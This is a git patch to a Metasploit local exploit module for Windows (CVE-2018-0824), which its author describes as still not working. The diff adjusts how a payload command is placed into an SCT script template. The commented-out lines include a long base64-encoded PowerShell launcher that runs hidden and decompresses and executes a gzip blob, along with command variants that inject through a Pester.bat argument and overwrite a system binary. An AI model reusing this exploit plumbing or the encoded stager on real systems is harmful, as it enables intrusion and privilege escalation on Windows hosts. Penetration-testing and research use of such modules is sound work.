From eeec3c115e762efec49faf19297252951b05c485 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Fri, 19 Oct 2018 16:12:47 -0500 Subject: [PATCH] This is as far as I can take it for an exploit module but it still does not work. Commiting for posterity. --- modules/exploits/windows/local/unmarshal.rb | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/local/unmarshal.rb b/modules/exploits/windows/local/unmarshal.rb index 3aff817681..71bbfa7171 100644 --- a/modules/exploits/windows/local/unmarshal.rb +++ b/modules/exploits/windows/local/unmarshal.rb @@ -131,14 +131,17 @@ class MetasploitModule < Msf::Exploit::Local vprint_status("Creating the sct file with payload #{payload_path}") local_script_template_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'script_template') script_template_data = ::IO.read(local_script_template_path) - temp_path = payload_path - print_status("Payload path: #{temp_path}") - temp_path.gsub!('\\', '\\\\\\\\') - print_status("Payload path: #{temp_path}") vprint_status("script_template_data.length = #{script_template_data.length}") - command = 'cmd.exe /c rundll32.exe ' + payload_path.gsub("\\", "\\\\\\\\") + ',0' -# script_data = script_template_data.sub!('SCRIPTED_COMMAND', command) +# command = '%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBIAFMAeQB5AEYAcwBDAEEANwBWAFcALwBXACsAYgBPAEIAagArAGUAWgBYADYAUAA2AEEAcABVAGsARABMAEUAdABLAG0AdgBhADMAUwBwAEkATQBFAEcAcgBLAFEASgB1AFcAcgBhAFIAZABOAEYAQgB4AHcAWQB6AEEARgAwAHkAUwA5ADIALwA5ACsAcgAwAG4AbwB1AGwAdAAzAHQANQAxADAASwBCAEcAMgBlAFQAKwBmADkANwBGAGYATAA4AHMAMABZAEoAaQBtAHcAbABLADUAMQBKAG4AdwB4ACsASABCAHEANgBtAGYAKwA0AGsAZwBOAGgASwB6AEoAVABRAGUAeAA5AE8AWgA5AE8AbwBWAEwARABlAFcAbgA0AFUAUABnAG4AaQBqAFoATgBtAEEASgBqADUATwBGADIAZABuAC8AVABMAFAAVQBjAHAAMgA4AC8AWQA1AFkAawBwAFIAbwBPAFMAVwBZAEYAUwBJAGsAdgBDAG4ANABNAFUAbwBSADIAOAB2AGIAdQA5AFEAQQBMAGEARgB4AHUAZgAyAE8AYQBHADMAUAB0AG0ATABiAGYAdAArAEUAQwBQAGgAcgBaAEsARwAvAE4AdQBZAEIAagA2AFAAcABXADEAbABCAEQATwB4ACsAZQBsAFQAVQA3AHAANQAyADEAMgAwAHQAZgB2AFMASgA0AFgAWQB0AEwAWQBGAFEAMABrADcASgBLAFEAcABDAFYAOABrADcAdABEAGUAWgBrAGgAcwBtAGoAagBJAGEAVQBHAFgAcgBPADMAaAA5AFAAaQBvADcAYQBTAEYAdgAwAFEAVABzAFAAYQBBAFQATQBSAGkARwBoAFoATgBDAFgASwBBAFgANAA1AFkAbQBhAGMAQwBaAE0AUABWAGQAeAAvAEYASgBnAHkAbgBPAFEAMgBVAE0ATQB4AFIAVQBUAFIAYgB3AGcAMAAzAGYATABOAFkALwBDADcAZQA3AEwAMQBlAGwAaQBuAEQAQwBXAG8AYgBLAFUATQA1AHoAUwB5AFUAUAArAEEAQQBGAGUAMgBoAG4ANABZAEUAWABhAEwAbABBAHIAUQBzAGwAdQBNADAAVwBrAGcAUwBpAEQAMwBRAEYAUgBJAGIAYQBVAGwASQBTAC8AZwBWAE0AKwBJAEUAcgBXAHYATQBmAGwAWgBKAGYASwA0AEUAVQBsAE8AVwBTAHkAMgBvADQAWABkAFoAbQBqAFEAcwBDAGQAcgBwAE4AVgA4AEkARQA2AG8AdQB3AFYATgBYAEgAawBEADcAYwBuAGgAdwBlAEwAQwBzAGEAWgBLAEYAeQBuAE8AUwB3AE8AagBWAFQAVABWAEcARQBKAGsANABwAFEAVwB1AHgARAA0AEkAYwBrAHMAdwB3AFkAdgBQAGEATAA2AEYAYQBjAFAATwBTAHkAUQB0AG4AbgBBAFYARwB0AEcAdwA5AFcAUAB0AGIAaQAwAEsAZwBnAC8ANABDAGwAWgB1AFgASQByAEQAQgBXAGoAcwA2ADkAagBJAHoARwA3AEUAMQAzAC8ATQB4AHcARgBhADQAaABRAE4AdABxAG0AZgA0AEsAQwBtAG4AUABnAFMAdgBHAGgASgBVAEoAVgBmAHUAeABhAGIAUQBFAHgAaQBjAC8AOABCAGgAUQBOAEUAVQBPAFEAegBEAGgAbQB2ADgAbgBkAHEAVwBvAEwAWgBrADYANQBhAFkAaABLAGkAWABBAG0AZwBSAEEAVgBFAEIAZABXAFQAdgBnADEAbQBWAHcAVwB4AGEAYQBRAG0AUwBnAEMAZwAzAFIAeABvADEAMQBnAEMAMABWAEUAdAB2AFMAZgAzAHQAdgBiAE8ANQB5AEQAVQA3AEIATwAvAEsARgByAEMAdABJAFMAZABGAHIAUQBFAEMALwBrAEUAaABTADEAQgBTAFEAdQA4AC8ANgBTAFUAagBGAGIARAA1AHQAZAB3AHoAWgBJAHcASABQAGcARgBxADgAMAB0AHAAQgByAEgAdgBiADgAKwBUAFEAdQBXAGwAdwBIAFUARABIAEsAMwByAFEAdwBGADIAQwBjAGMAaQBwAFkAdwB4AEMARgBTAHQAeABhAE8AYQByAC8ATgBGADQASABvACsANABUAEEARABnAEIATABEADEAQQBJAFcATwBFAEEAVwBJAHcAegBJAFkAYwBRAG8AZQBwAFMAMgAwAEwATQBTAEQASwBDAEUAcABDAG8ATgByAHgATwAvAEEAaQAyADkANQA3AGwARgBYAEgAOABDAEkAWABOAHYAOABkAFgAOAAzAGgASABXAG8ANQBFAEQAYwBHAHoANgBLAEMAOABGAHEARwBzAEoAYgBnADQAWgAzAEIAdQBjAEYAUwBCAFEAdgAvAEYAOQA3AFAAagBvAG8AcQBpAG4ANgBOADkARgBjAFIANgBZADkAeQBvAFcAOABiADUAMwBMAGcAUABPAEIAbgAzAGcARgBUAHAANQB3AHgAUwAxADMATwBhAHEASAA2AEIAVABuAHUANwBvADAARgA4ADMAZABIAHcANABHAFEANgBvAEkAOABLAFAASgBwACsATwBYAE4AVgB5ADMARwB2AEQAVABNAGMARQBjAHQAZwAxAGwAegBEAFkAeQBlAE8ARABkAHcAMQBJAHAAaAB2AEgAUwAyAGEATQBqAG4ANwBhAE4AdgBEAGsAVABVAFkASwB2AGwAZwBFAHkAOABWAG8AegBDADAAbwBiAHEAZABkAFYAVQBsAEcATwBMAGYAMwBKAEgAcQBPAEsAQwBIACsAKwBQAFoAMwBjAFoAUQBRAGoAVwBKAHIAcQBKADUAZgAyADEATQA0AHkAcwBEAEgAUABYAEgAawBSAEgAQgBXAHoAWABpAFEASgBXAHYANQBVAGkAVgA5AGYANwBZAFUAbQBNAE4AeQAwAHAAawB6AFkAYQB6AFgAdgBmAGEANgBMAHcAagBLAG4ANgAwAEQARQBzAFoAZQBrAC8AKwBuAHYAeABvAHYAZAA3AHcAYQBtAE0AcgBFADMATwBrAHgAUABwAEYAcQBIAGUAUAA5AEUAcAAvAHgAZgBXAHYAVgArAGYAagBnAFYAYgBOAEEAegA2AGYAegBRAHMATgBhACsAQgBIADAAKwBjAHoATgAwAGEAZQBtADYAbQBlAHAAbAAvAFAAMwBNAHkASQAzAHEAeQBqAG0AVAB2AHUAOQBQAFIAWQBoAFgAVQBEAGIAOABhAFoAMQBZAEcAbgAyAHcAVQBjAG0ARwAzAGQAbgBoAHoANwAzAGsAbAAyAG0ANwBnAHkAWQBPAFIAWgBSAGgAcABiAHcAYgBKAHYARAA0AE4ARQA3AFgAUgBjAHAAegBzAHgATQBOAEoAdABiAHkAVgB2ADEAcABxADgAMgBiAG8AVAAwAEsARwBuAGIAcABxAGsASABGAFoAbAAyAG4ARgBQADEAVwBxADAAdQBiAEMATgAwAHIAVABuAHYAZgBHAGQAOQBqAGkAeABlAGgAdgBUADEAaABSAHYAaABVAGQAcgBKAHgAMgB1AHAAdwBXAEEAbwBrADcATQBnAE4AagBPAEUAUgAwADQAYwBuAEwAcQA5AHAATABsAGgAawBPAGwARABEAHAAZABGAEMAMwA1AGEASAB5AHMAagBzAEsAcgA2ADYAMwB2AGIAZQA1AGMAWgAzAFQAdgBlAHUAYQBKAG0AOABiADMAawArAE4ATABOAGsAdABEADkAZABhAGQAUABaAG8AawBkAGgAUQBOADcATABvAFQASAAvAEsAdABiAEYAcgBqAFMARABIAHYAKwAxAG8AVgBpAGEANwBhAGoAZwB3ACsAUwArAGEATwA3AHgANAA2AFgAUQBlAFAATgBnAG4AOQBlAEMAWABqADAAVAB1AFAATABqADAAeQBvAHQASABBAEIARQA0AGsAbwA5ADQANQAxAFcAWQB1AEcAWgBXAHAAZQA1ADcAUwBlAGEAWABlAGUAZQArAEMAVABkAFgAbQBzAGIAOQB6AEkARwBkAG4AbgB6AGYAZwBNAHAANwBOADUAdwBoAHcAZwBkAHAAMgBoAC8ATABkAGMARAAyAFAAYgBNAGgAcgBWAEsANwBzADkAUQBRAHAAdABUADcAVQA5ADcAMgBzAGwATwBYADkAcQBlADUAdwBMAHQAaQBlAGwAdwBFAFcAeQBVAGcARwBEAG0AawBhAHgASwBZAG8AcwAwAHEAUAA0AEoAWAB6AHgAbgBuAFMAVwAzAFgAQgBqADUARwBtADgATgAvAEEAMwB3AGUAZgBRAEMAbQBsAGkAdgBXAE4AawA1AHgAcQBtAFQALwBxADEAWgBnADUAZQBMAEQAcAA5AC8AWAAxADAATgBwAGUAMAAyAEkASQBYAEIAcgB3AHUARwBSAHkATgAvAEQATwBxAGUASgB4ADMAQgAvADYAWABVAHAAdQBPADkAMwBaAGgAdwArAHYAKwBVADYARAByAGQAYgBZAHIASgBMAHoAWgAzAHYAbwBSAHoAMwBQADkAUABNAGkAOQBnAG4AcwBMAFcAaABuADkAVgBHAG0AMAAxAHoAZgB0ADYAZwBwAHgAVgB4AEQARgBIAGMAMwBtAGgAWABLAFUAMABUAGcAVABnAEMAMwBoAHYAcABJAFUAQQBpAGgAQQBlACsAUAB2AEoAdABCAGEAOQA0ADEAVABOADYALwBIAFIAZwBlAEgANwAwADQAawBvAFEAbgBRAGUAbAByADQANgB5AFgAegBzADYAdQBJAFUAbwA0AFoATwA2AEQAOQBoAGkAbABFAFkAdABiADgAdQBaAFkAbABxAEUATgB5AHAAdQBlAEQARABuACsAZgBGADUAOQBtAG0AMQBGAE0ATgBUAGkAVABiAFMAQwBaAFcAZQBYAFYASABZAGwAZgB1AHcAMAAwAG8ARgBqACsAdgA4AHoAVwB2AHYAagBMAG8AWgBYACsAQwA5AG8AZgBWADMANwBoADYAOAAvAGgAYQBEAGMAMgBtAFgAOAAzAGYASwAzAEMANwA4AEUANgBLACsAbgA3AHYAbQBZAGcAYQBnAEYASgB6AFoAQgB1ADgAdgBDAGkAdwBqAHMAcQBmAEgAOABJAHMAVQBMAEEANwBWAGYANwBoADkAKwBEAGIANABvADIAZABzAEoAWABMAEEATwBEAC8ANABDADUANABxAFoARwBXADgATABBAEEAQQA9ACcAJwApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=' +# command = 'cmd.exe /c \\\"C:\\\\\\\\Program files\WindowsPowerShell\\\\\\\\Modules\\\\\\\\Pester\\\\\\\\3.4.0\\\\\\\\bin\\\\\\\\Pester.bat\\\" /help \\\"$null; c:\\\\\\\\Users\\\\\\\\msfuser\\\\\\\\downloads\\\\\\\\test.exe' +# command = 'C:\Users\msfuser\Downloads\test.bat' +# command.gsub!('\\', '\\\\\\\\') + command = 'C:\users\msfuser\downloads\test.exe' +# command = 'copy /Y C:\\users\\msfuser\\downloads\\test.exe C:\\windows\\system32\\notepad.exe.bak' +# command.gsub!('\\', '\\\\\\\\\\\\') script_data = script_template_data.sub!('SCRIPTED_COMMAND', command) +# script_data = script_template_data.sub!('SCRIPTED_COMMAND', 'C:\\\\\\\\windows\\\\\\\\system32\\\\\\\\test.exe') +# script_data = script_template_data.sub!('SCRIPTED_COMMAND', 'C:\\\\\\\\Users\\\\\\\\msfuser\\\\\\\\Downloads\\\\\\\\putty.exe') if script_data == nil fail_with(Failure::BadConfig, "Failed to substitute command in script_template") end